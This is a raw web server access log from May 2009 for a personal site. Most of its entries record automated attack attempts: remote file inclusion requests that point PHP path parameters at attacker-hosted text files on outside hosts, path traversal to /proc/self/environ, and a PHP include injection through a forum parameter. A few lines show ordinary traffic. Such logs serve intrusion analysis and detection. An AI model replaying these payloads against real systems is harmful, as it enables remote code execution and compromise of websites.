218.27.203.107 - - [20/May/2009:10:11:08 -0700] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:10:11:08 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:10:11:08 -0700] "GET /logs/access_090201.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:11:15 -0700] "GET ///index.php?kietu[url_hit]=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 200 41945 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:11:16 -0700] "GET ///index.php?kietu[url_hit]=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 200 41945 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:11:28 -0700] "GET /logs/access_081116.log//appserv/main.php?appserv_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:11:29 -0700] "GET /appserv/main.php?appserv_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:11:29 -0700] "GET /logs//appserv/main.php?appserv_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:11:30 -0700] "GET /logs/access_090112.log//appserv/main.php?appserv_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:11:32 -0700] "GET /logs/access_080710.log%20////index.php?kietu[url_hit]=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:10:11:38 -0700] "GET /logs/access_081208.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:10:11:38 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:11:45 -0700] "GET /logs/access_080710.log%20////index.php?kietu[url_hit]=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:10:11:53 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [20/May/2009:10:12:07 -0700] "GET /administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [20/May/2009:10:12:07 -0700] "GET /logs/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [20/May/2009:10:12:07 -0700] "GET /logs/access_080316.log/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:12:19 -0700] "GET /logs/access_081116.log//appserv/main.php?appserv_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:12:20 -0700] "GET /appserv/main.php?appserv_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:10:12:21 -0700] "GET /logs/access_080923.log%20%20//squirrelcart/cart_content.php?cart_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:12:21 -0700] "GET /logs//appserv/main.php?appserv_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:12:21 -0700] "GET /logs/access_090112.log//appserv/main.php?appserv_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.107.138.34 - - [20/May/2009:10:12:27 -0700] "GET /logs/access_080304.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.107.138.34 - - [20/May/2009:10:12:27 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.107.138.34 - - [20/May/2009:10:12:27 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [20/May/2009:10:12:44 -0700] "GET /modul.php?mod=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [20/May/2009:10:12:44 -0700] "GET /logs/modul.php?mod=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [20/May/2009:10:12:44 -0700] "GET /logs/access_080924.log%20%20/modul.php?mod=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [20/May/2009:10:12:44 -0700] "GET /logs/access_080901.log%20%20/modul.php?mod=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [20/May/2009:10:12:44 -0700] "GET /logs/access_080710.log%20%20//calendar/samplecalendar.php?path[docroo=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [20/May/2009:10:12:44 -0700] "GET /calendar/samplecalendar.php?path[docroo=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [20/May/2009:10:12:44 -0700] "GET /logs//calendar/samplecalendar.php?path[docroo=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.107.138.34 - - [20/May/2009:10:12:44 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.107.138.34 - - [20/May/2009:10:12:44 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:10:12:46 -0700] "GET /logs/access_080313.log//faqsupport/samplefaqsupport.php?path[docroot]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.107.138.34 - - [20/May/2009:10:12:47 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.107.138.34 - - [20/May/2009:10:12:49 -0700] "GET /logs/access_080304.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.107.138.34 - - [20/May/2009:10:12:50 -0700] "GET /logs/access_080430.log//newspublish/include.php?path%5Bdocroot%5D=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:10:12:51 -0700] "GET /logs/access_080219.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.107.138.34 - - [20/May/2009:10:12:53 -0700] "GET /logs/access_080430.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:10:12:54 -0700] "GET /logs/access_080809.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.107.138.34 - - [20/May/2009:10:13:03 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.107.138.34 - - [20/May/2009:10:13:03 -0700] "GET /logs/access_080430.log//newspublish/include.php?path%5Bdocroot%5D=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [20/May/2009:10:13:07 -0700] "GET /logs/access_080901.log/modul.php?mod=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [20/May/2009:10:13:07 -0700] "GET /logs/access_080924.log/modul.php?mod=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.38.181.51 - - [20/May/2009:10:13:24 -0700] "GET /logs/access_090326.log//include/write.php?dir=http://largeface.com/gnuboard4/gnus/fxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [20/May/2009:10:13:28 -0700] "GET /logs/access_080316.log%20%20/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:10:13:29 -0700] "GET /logs/access_080313.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.51.41.98 - - [20/May/2009:10:13:39 -0700] "GET /administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.51.41.98 - - [20/May/2009:10:13:39 -0700] "GET /logs/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.51.41.98 - - [20/May/2009:10:13:40 -0700] "GET /logs/access_080316.log/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.53.250.98 - - [20/May/2009:10:13:42 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.53.250.98 - - [20/May/2009:10:13:42 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [20/May/2009:10:14:07 -0700] "GET /calendar/samplecalendar.php?path[docroo=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [20/May/2009:10:14:07 -0700] "GET /logs//calendar/samplecalendar.php?path[docroo=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [20/May/2009:10:14:07 -0700] "GET /logs/access_080710.log//calendar/samplecalendar.php?path[docroo=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [20/May/2009:10:14:12 -0700] "GET /logs/access_080216.log//calendar/samplecalendar.php?path[docroo=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:14:14 -0700] "GET /logs/access_080201.log//?option=com_events&Itemid=312&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:10:14:16 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:14:20 -0700] "GET /logs//?option=com_events&Itemid=312&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 100339 "-" "libwww-perl/5.803" "www.dmulk.com"
202.53.250.98 - - [20/May/2009:10:14:26 -0700] "GET /logs/access_080430.log//newspublish/include.php?path%5Bdocroot%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:10:14:31 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:14:32 -0700] "GET /logs/access_080402.log//?option=com_events&Itemid=312&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.239.112.19 - - [20/May/2009:10:14:41 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://h1.ripway.com/dinayu/blk.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
195.239.112.19 - - [20/May/2009:10:14:46 -0700] "GET /logs/access_081210.log/e404.php?DOCUMENT_ROOT=http://h1.ripway.com/dinayu/blk.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:14:55 -0700] "GET /?option=com_events&Itemid=312&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 42110 "-" "libwww-perl/5.803" "www.dmulk.com"
72.51.41.98 - - [20/May/2009:10:15:07 -0700] "GET /logs/access_080316.log%20%20/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [20/May/2009:10:15:35 -0700] "GET /logs/access_081003.log%20%20/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.150.98 - - [20/May/2009:10:15:49 -0700] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.150.98 - - [20/May/2009:10:15:49 -0700] "GET /logs/access_080611.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.150.98 - - [20/May/2009:10:15:49 -0700] "GET /logs/access_080419.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:16:16 -0700] "GET /logs/access_090407.log//?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:16:16 -0700] "GET /logs/access_090407.log//?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:10:16:44 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
119.63.193.186 - - [20/May/2009:10:16:47 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0150.jpg HTTP/1.1" 200 378254 "-" "BaiduImagespider+(+http://www.baidu.jp/spider/)" "dmulk.com"
218.27.203.107 - - [20/May/2009:10:17:21 -0700] "GET /logs//?path%5Bdocroot%5D=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 200 100339 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:10:17:25 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
218.27.203.107 - - [20/May/2009:10:17:29 -0700] "GET /logs//?path%5Bdocroot%5D=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 200 100339 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:10:17:30 -0700] "GET /logs/access_081009.log%20%20//?path%5Bdocroot%5D=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:10:17:30 -0700] "GET /logs/access_081123.log%20%20//?path%5Bdocroot%5D=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:10:17:35 -0700] "GET /logs/access_081009.log//?path%5Bdocroot%5D=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:10:17:36 -0700] "GET /logs/access_081123.log//?path%5Bdocroot%5D=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.252.20 - - [20/May/2009:10:17:41 -0700] "GET /logs/access_080906.log/e404.php?DOCUMENT_ROOT=http://jsgok.com/technote7//data/mildnetid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
124.217.252.20 - - [20/May/2009:10:17:41 -0700] "GET /e404.php?DOCUMENT_ROOT=http://jsgok.com/technote7//data/mildnetid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
124.217.252.20 - - [20/May/2009:10:17:41 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://jsgok.com/technote7//data/mildnetid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
124.217.252.20 - - [20/May/2009:10:17:41 -0700] "GET /logs/access_081210.log/e404.php?DOCUMENT_ROOT=http://jsgok.com/technote7//data/mildnetid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:10:17:54 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
72.51.41.98 - - [20/May/2009:10:18:00 -0700] "GET /logs/access_081003.log%20%20/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:10:18:01 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:10:18:01 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:10:18:01 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:10:18:01 -0700] "GET /logs/access_080329.log%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:10:18:08 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:10:18:15 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:10:18:29 -0700] "GET /logs/access_080308.log%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:10:18:31 -0700] "GET /?path%5Bdocroot%5D=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 200 42108 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:10:18:40 -0700] "GET /?path%5Bdocroot%5D=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 200 42036 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.150.98 - - [20/May/2009:10:19:32 -0700] "GET /logs/access_080512.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.150.98 - - [20/May/2009:10:19:32 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:10:19:32 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:10:19:32 -0700] "GET /logs/access_080130.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:10:19:32 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:10:19:32 -0700] "GET /logs/access_080130.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:10:19:32 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:10:19:33 -0700] "GET /logs/access_080130.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:10:19:33 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:10:19:33 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:10:19:33 -0700] "GET /logs/access_080130.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:10:19:33 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:10:19:33 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:10:19:33 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:10:19:36 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
